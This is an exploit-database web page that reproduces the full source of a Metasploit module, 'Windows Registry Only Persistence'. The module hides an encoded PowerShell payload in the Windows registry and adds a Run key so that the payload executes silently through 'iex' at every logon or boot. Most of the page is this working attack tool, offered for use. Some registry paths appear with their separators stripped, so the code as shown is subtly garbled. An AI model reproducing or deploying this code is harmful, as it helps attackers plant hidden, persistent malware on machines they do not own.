0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Windows Multiple - Registry Only Persistence Exploit

Author

Donny Maasland

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::Powershell
include Msf::Post::Windows::Registry
include Msf::Post::File

def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Registry Only Persistence',
'Description' => %q{
This module will install a payload that is executed during boot.
It will be executed either at user logon or system startup via the registry
value in "CurrentVersionRun" (depending on privilege and selected method).
The payload will be installed completely in registry.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Donny Maasland <donny.maasland[at]fox-it.com>',
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'cmd' ],
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Jul 1 2015",
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true'
}
))

register_options([
OptEnum.new('STARTUP',
[true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
OptString.new('BLOB_REG_KEY',
[false, 'The registry key to use for storing the payload blob. (Default: random)' ]),
OptString.new('BLOB_REG_NAME',
[false, 'The name to use for storing the payload blob. (Default: random)' ]),
OptString.new('RUN_NAME',
[false, 'The name to use for the 'Run' key. (Default: random)' ]),
OptBool.new('CREATE_RC',
[false, 'Create a resource file for cleanup', true]),
], self.class)
end

def generate_payload_blob
opts = {
use_single_quotes: true,
encode_final_payload: true,
}
blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first, opts).split(' ')[-1]
return blob
end

def generate_cmd(root_path, blob_key_name, blob_key_reg)
cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))""
return cmd
end

def generate_blob_reg
blob_reg_key = datastore['BLOB_REG_KEY'] || "Software#{Rex::Text.rand_text_alphanumeric(8)}"
blob_reg_name = datastore['BLOB_REG_NAME'] || Rex::Text.rand_text_alphanumeric(8)
return blob_reg_key, blob_reg_name
end

def generate_cmd_reg
cmd_reg = datastore['RUN_NAME'] || Rex::Text.rand_text_alphanumeric(8)
return cmd_reg
end

def install_blob(root_path, blob, blob_reg_key, blob_reg_name)
blob_reg_key = "#{root_path}#{blob_reg_key}"
new_key = false
if not registry_enumkeys(blob_reg_key)
unless registry_createkey(blob_reg_key)
fail_with(Failure::Unknown,"Failed to create key #{blob_reg_key}")
end
print_good("Created registry key #{blob_reg_key}")
new_key = true
end

unless registry_setvaldata(blob_reg_key, blob_reg_name, blob, "REG_SZ")
fail_with(Failure::Unknown,'Failed to open the registry key for writing')
end
print_good("Installed payload blob to #{blob_reg_key}#{blob_reg_name}")
return new_key
end

def install_cmd(cmd, cmd_reg, root_path)
unless registry_setvaldata("#{root_path}SoftwareMicrosoftWindowsCurrentVersionRun", cmd_reg, cmd, 'REG_EXPAND_SZ')
fail_with(Failure::Unknown,'Could not install run key')
end
print_good("Installed run key #{root_path}SoftwareMicrosoftWindowsCurrentVersionRun#{cmd_reg}")
end

def get_root_path
if datastore['STARTUP'] == 'USER'
root_path = 'HKCU'
else
root_path = 'HKLM'
end
return root_path
end

def log_file(log_path = nil) # Thanks Meatballs for this
# Get hostname
host = session.session_host

# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

# Create a directory for the logs
if log_path
logs = ::File.join(log_path, 'logs', 'persistence',
Rex::FileUtils.clean_path(host + filenameinfo))
else
logs = ::File.join(Msf::Config.log_directory, 'persistence',
Rex::FileUtils.clean_path(host + filenameinfo))
end

# Create the log directory
::FileUtils.mkdir_p(logs)

# logfile name
logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
logfile
end

def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key) # Thanks Meatballs for this
clean_rc = log_file()
@clean_up_rc = ""
@clean_up_rc << "reg deleteval -k '#{root_path}#{blob_reg_key}' -v '#{blob_reg_name}'n"
if new_key
@clean_up_rc << "reg deletekey -k '#{root_path}#{blob_reg_key}'n"
end
@clean_up_rc << "reg deleteval -k '#{root_path}SoftwareMicrosoftWindowsCurrentVersionRun' -v '#{cmd_reg}'n"
file_local_write(clean_rc, @clean_up_rc)
print_status("Clean up Meterpreter RC file: #{clean_rc}")

report_note(:host => session.session_host,
type: 'host.persistance.cleanup',
data: {
local_id: session.sid,
stype: session.type,
desc: session.info,
platform: session.platform,
via_payload: session.via_payload,
via_exploit: session.via_exploit,
created_at: Time.now.utc,
commands: @clean_up_rc
}
)
end

def check
unless registry_enumkeys("HKLMSOFTWAREMicrosoft").include?("PowerShell")
return Msf::Exploit::CheckCode::Safe
end
return Msf::Exploit::CheckCode::Vulnerable
end

def exploit
unless registry_enumkeys("HKLMSOFTWAREMicrosoft").include?("PowerShell")
print_warning('Warning: PowerShell does not seem to be available, persistence might fail')
end

print_status('Generating payload blob..')
blob = generate_payload_blob
print_good("Generated payload, #{blob.length} bytes")

root_path = get_root_path
print_status("Root path is #{root_path}")

blob_reg_key, blob_reg_name = generate_blob_reg
cmd = generate_cmd(root_path, blob_reg_key, blob_reg_name)
cmd_reg = generate_cmd_reg

print_status('Installing payload blob..')
new_key = install_blob(root_path, blob, blob_reg_key, blob_reg_name)

print_status('Installing run key')
install_cmd(cmd, cmd_reg, root_path)

if datastore['CREATE_RC']
create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
end
end
end

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Windows Multiple - Registry Only Persistence Exploit

Report Error

Report Error